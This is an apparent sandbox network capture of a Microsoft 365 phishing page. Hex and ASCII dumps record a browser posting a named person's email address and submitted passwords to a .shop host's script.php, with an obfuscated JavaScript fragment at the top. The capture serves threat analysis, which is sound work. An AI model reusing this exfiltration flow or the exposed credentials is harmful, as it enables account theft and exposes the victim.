                                Data Ascii: 1f404b6')])){var n;try{G[mD('0x982','0x8fc',0x569,'0x467','0x90f')](G[mK('0xcc',-0x339,'0x174',-0x1ff,'0x27c')],G[mD(0x264,'0x19',0x3ab,'0x6aa',0x599)])?s[mL('0x89d',0x91b,0xeac,'0xce4',0xc24)](Y,s[mD(0x9b3,'0x828',0x59d,'0x52b','0xbb1')])[md(0x2af,0x59


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                17192.168.2.449763104.26.12.2054434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:04 UTC349OUTGET /?format=json HTTP/1.1
                                Host: api.ipify.org
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: */*
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:04 UTC430INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:04 GMT
                                Content-Type: application/json
                                Content-Length: 21
                                Connection: close
                                Vary: Origin
                                CF-Cache-Status: DYNAMIC
                                Server: cloudflare
                                CF-RAY: 901a8ffcddfc41e7-EWR
                                server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=2012&rtt_var=771&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=927&delivery_rate=1404521&cwnd=202&unsent_bytes=0&cid=b36844a833377cb5&ts=196&x=0"
                                2025-01-14 03:33:04 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                Data Ascii: {"ip":"8.46.123.189"}


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                18192.168.2.449764203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:04 UTC380OUTGET /m/ic/3T4T2XYROSS7AR2M47G6BM7KZ HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: */*
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:04 UTC247INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:04 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/html; charset=UTF-8
                                2025-01-14 03:33:04 UTC7945INData Raw: 33 65 33 63 0d 0a 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33
                                Data Ascii: 3e3ch(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333
                                2025-01-14 03:33:05 UTC7993INData Raw: 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
                                Data Ascii: DDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDD
                                2025-01-14 03:33:05 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:05 UTC1249INData Raw: 34 64 61 0d 0a 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 99 99 99 99 99 99 99 70 03 33 33 33 33 33 33 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa aa aa aa aa aa aa 50 04 ee ee ee ee ee ee ee 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88 66 66 66 66 66 66 66 b0 0d 88 88 88 88 88 88 88
                                Data Ascii: 4da"3333333"""""""3333333"""""""3333333p3333333Pfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
                                2025-01-14 03:33:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                19192.168.2.449767203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:06 UTC362OUTGET /m/script.php HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: */*
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:07 UTC496INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:06 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Access-Control-Allow-Headers: Authorization, Content-Type
                                Access-Control-Allow-Origin: *
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                Set-Cookie: PHPSESSID=85on4fjog8grd7jidvbu7erq4i; path=/
                                Vary: User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: application/php; charset=utf-8
                                2025-01-14 03:33:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                20192.168.2.449768203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:06 UTC676OUTPOST /m/script.php HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                Content-Length: 246
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                Accept: */*
                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Origin: https://mudedevidaparasempre.com.br
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:06 UTC246OUTData Raw: 61 63 74 69 6f 6e 3d 73 69 67 6e 75 70 26 61 74 79 70 65 3d 50 61 73 73 50 61 67 65 26 65 6d 61 69 6c 3d 6f 6c 69 76 69 65 72 2e 64 6f 7a 61 74 25 34 30 69 6e 6e 6f 63 61 70 2e 63 6f 6d 26 70 68 6f 6e 65 3d 26 70 67 74 79 70 65 3d 26 70 61 67 65 6d 73 67 3d 25 37 42 25 32 32 4c 6f 67 69 6e 50 61 67 65 25 32 32 25 33 41 25 37 42 25 32 32 74 65 78 74 25 32 32 25 33 41 6e 75 6c 6c 25 32 43 25 32 32 63 6f 6c 6f 72 25 32 32 25 33 41 25 32 32 62 6c 61 63 6b 25 32 32 25 37 44 25 32 43 25 32 32 50 61 73 73 50 61 67 65 25 32 32 25 33 41 25 37 42 25 32 32 74 65 78 74 25 32 32 25 33 41 6e 75 6c 6c 25 32 43 25 32 32 63 6f 6c 6f 72 25 32 32 25 33 41 25 32 32 62 6c 61 63 6b 25 32 32 25 37 44 25 37 44 26 6d 6f 64 65 3d 47 6f 74 6f 54 79 70 65
                                Data Ascii: action=signup&atype=PassPage&email=olivier.dozat%40innocap.com&phone=&pgtype=&pagemsg=%7B%22LoginPage%22%3A%7B%22text%22%3Anull%2C%22color%22%3A%22black%22%7D%2C%22PassPage%22%3A%7B%22text%22%3Anull%2C%22color%22%3A%22black%22%7D%7D&mode=GotoType
                                2025-01-14 03:33:07 UTC496INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:06 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Access-Control-Allow-Headers: Authorization, Content-Type
                                Access-Control-Allow-Origin: *
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                Set-Cookie: PHPSESSID=8knbjui1ormbatprn6e30fc0es; path=/
                                Vary: User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: application/php; charset=utf-8
                                2025-01-14 03:33:07 UTC6795INData Raw: 31 61 38 33 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 6d 73 67 22 3a 22 20 3c 64 69 76 20 72 6f 6c 65 3d 5c 22 6d 61 69 6e 5c 22 3e 5c 72 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 51 54 31 35 50 38 35 58 39 38 5c 22 3e 5c 72 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 61 6e 69 6d 61 74 65 20 73 6c 69 64 65 2d 69 6e 2d 6e 65 78 74 5c 22 3e 5c 72 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                Data Ascii: 1a83{"status":"success","msg":" <div role=\"main\">\r\n <div class=\"QT15P85X98\">\r\n <div class=\"animate slide-in-next\">\r\n
                                2025-01-14 03:33:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                21192.168.2.449772203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:07 UTC676OUTPOST /m/script.php HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                Content-Length: 247
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                Accept: */*
                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Origin: https://mudedevidaparasempre.com.br
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:07 UTC247OUTData Raw: 61 63 74 69 6f 6e 3d 73 69 67 6e 75 70 26 61 74 79 70 65 3d 45 6d 61 69 6c 50 61 67 65 26 65 6d 61 69 6c 3d 6f 6c 69 76 69 65 72 2e 64 6f 7a 61 74 25 34 30 69 6e 6e 6f 63 61 70 2e 63 6f 6d 26 70 68 6f 6e 65 3d 26 70 67 74 79 70 65 3d 26 70 61 67 65 6d 73 67 3d 25 37 42 25 32 32 4c 6f 67 69 6e 50 61 67 65 25 32 32 25 33 41 25 37 42 25 32 32 74 65 78 74 25 32 32 25 33 41 6e 75 6c 6c 25 32 43 25 32 32 63 6f 6c 6f 72 25 32 32 25 33 41 25 32 32 62 6c 61 63 6b 25 32 32 25 37 44 25 32 43 25 32 32 50 61 73 73 50 61 67 65 25 32 32 25 33 41 25 37 42 25 32 32 74 65 78 74 25 32 32 25 33 41 6e 75 6c 6c 25 32 43 25 32 32 63 6f 6c 6f 72 25 32 32 25 33 41 25 32 32 62 6c 61 63 6b 25 32 32 25 37 44 25 37 44 26 6d 6f 64 65 3d 47 6f 74 6f 54 79 70 65
                                Data Ascii: action=signup&atype=EmailPage&email=olivier.dozat%40innocap.com&phone=&pgtype=&pagemsg=%7B%22LoginPage%22%3A%7B%22text%22%3Anull%2C%22color%22%3A%22black%22%7D%2C%22PassPage%22%3A%7B%22text%22%3Anull%2C%22color%22%3A%22black%22%7D%7D&mode=GotoType
                                2025-01-14 03:33:07 UTC496INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:07 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Access-Control-Allow-Headers: Authorization, Content-Type
                                Access-Control-Allow-Origin: *
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                Set-Cookie: PHPSESSID=f6kf322lj3ph5beamegg3s604s; path=/
                                Vary: User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: application/php; charset=utf-8
                                2025-01-14 03:33:07 UTC5165INData Raw: 31 34 32 35 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 6d 73 67 22 3a 22 3c 64 69 76 20 72 6f 6c 65 3d 5c 22 6d 61 69 6e 5c 22 3e 5c 72 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 4f 49 4f 4f 4c 4f 30 46 54 36 5c 22 3e 5c 72 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 5c 22 70 61 67 69 6e 61 74 69 6f 6e 2d 76 69 65 77 20 61 6e 69 6d 61 74 65 20 73 6c 69 64 65 2d 69 6e 2d 6e 65 78 74 5c 22 3e 5c 72 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                Data Ascii: 1425{"status":"success","msg":"<div role=\"main\">\r\n <div class=\"OIOOLO0FT6\">\r\n <div class=\"pagination-view animate slide-in-next\">\r\n
                                2025-01-14 03:33:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                22192.168.2.449771203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:07 UTC408OUTGET /m/script.php HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: */*
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                Cookie: PHPSESSID=85on4fjog8grd7jidvbu7erq4i
                                2025-01-14 03:33:07 UTC438INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:07 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Access-Control-Allow-Headers: Authorization, Content-Type
                                Access-Control-Allow-Origin: *
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                Vary: User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: application/php; charset=utf-8
                                2025-01-14 03:33:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                23192.168.2.449779203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:08 UTC408OUTGET /m/script.php HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: */*
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                Cookie: PHPSESSID=85on4fjog8grd7jidvbu7erq4i
                                2025-01-14 03:33:08 UTC438INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:08 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Access-Control-Allow-Headers: Authorization, Content-Type
                                Access-Control-Allow-Origin: *
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                Vary: User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: application/php; charset=utf-8
                                2025-01-14 03:33:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                24192.168.2.449783203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:17 UTC676OUTPOST /m/script.php HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                Content-Length: 101
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                Accept: */*
                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Origin: https://mudedevidaparasempre.com.br
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:17 UTC101OUTData Raw: 61 63 74 69 6f 6e 3d 73 69 67 6e 75 70 26 65 6d 61 69 6c 3d 6f 6c 69 76 69 65 72 2e 64 6f 7a 61 74 25 34 30 69 6e 6e 6f 63 61 70 2e 63 6f 6d 26 65 70 61 73 73 3d 25 35 45 69 55 25 35 44 44 45 6d 25 33 41 28 68 75 69 62 26 6d 6f 64 65 3d 4f 66 66 69 63 65 4c 6f 67 69 6e 26 6d 61 69 6e 68 6f 73 74 3d 30
                                Data Ascii: action=signup&email=olivier.dozat%40innocap.com&epass=%5EiU%5DDEm%3A(huib&mode=OfficeLogin&mainhost=0
                                2025-01-14 03:33:24 UTC496INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:17 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Access-Control-Allow-Headers: Authorization, Content-Type
                                Access-Control-Allow-Origin: *
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                Set-Cookie: PHPSESSID=tsdn307ksc4vjjff6rc3gasqq8; path=/
                                Vary: User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: application/php; charset=utf-8
                                2025-01-14 03:33:24 UTC79INData Raw: 34 39 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 73 67 22 3a 22 6c 6f 67 69 6e 5f 66 61 69 6c 65 64 22 2c 22 64 74 79 22 3a 22 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 22 7d 0d 0a
                                Data Ascii: 49{"status":"error","msg":"login_failed","dty":"login.microsoftonline.com"}
                                2025-01-14 03:33:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                25192.168.2.449784203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:24 UTC408OUTGET /m/script.php HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: */*
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                Cookie: PHPSESSID=85on4fjog8grd7jidvbu7erq4i
                                2025-01-14 03:33:24 UTC438INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:24 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Access-Control-Allow-Headers: Authorization, Content-Type
                                Access-Control-Allow-Origin: *
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                Vary: User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: application/php; charset=utf-8
                                2025-01-14 03:33:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                26192.168.2.449785203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:38 UTC676OUTPOST /m/script.php HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                Content-Length: 103
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                Accept: */*
                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Origin: https://mudedevidaparasempre.com.br
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:38 UTC103OUTData Raw: 61 63 74 69 6f 6e 3d 73 69 67 6e 75 70 26 65 6d 61 69 6c 3d 6f 6c 69 76 69 65 72 2e 64 6f 7a 61 74 25 34 30 69 6e 6e 6f 63 61 70 2e 63 6f 6d 26 65 70 61 73 73 3d 50 79 45 25 35 44 50 6d 72 75 36 38 5a 41 39 59 25 35 42 6d 55 26 6d 6f 64 65 3d 4f 66 66 69 63 65 4c 6f 67 69 6e 26 6d 61 69 6e 68 6f 73 74 3d 30
                                Data Ascii: action=signup&email=olivier.dozat%40innocap.com&epass=PyE%5DPmru68ZA9Y%5BmU&mode=OfficeLogin&mainhost=0
                                2025-01-14 03:33:45 UTC496INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:38 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Access-Control-Allow-Headers: Authorization, Content-Type
                                Access-Control-Allow-Origin: *
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                Set-Cookie: PHPSESSID=rq42moaf4p5nn6t4cobrl6ud3t; path=/
                                Vary: User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: application/php; charset=utf-8
                                2025-01-14 03:33:45 UTC79INData Raw: 34 39 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 73 67 22 3a 22 6c 6f 67 69 6e 5f 66 61 69 6c 65 64 22 2c 22 64 74 79 22 3a 22 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 22 7d 0d 0a
                                Data Ascii: 49{"status":"error","msg":"login_failed","dty":"login.microsoftonline.com"}
                                2025-01-14 03:33:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                27192.168.2.449787203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:46 UTC408OUTGET /m/script.php HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: */*
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: cors
                                Sec-Fetch-Dest: empty
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                Cookie: PHPSESSID=85on4fjog8grd7jidvbu7erq4i
                                2025-01-14 03:33:46 UTC438INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:46 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Access-Control-Allow-Headers: Authorization, Content-Type
                                Access-Control-Allow-Origin: *
                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                Cache-Control: no-store, no-cache, must-revalidate
                                Pragma: no-cache
                                Vary: User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: application/php; charset=utf-8
                                2025-01-14 03:33:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                28192.168.2.449825203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
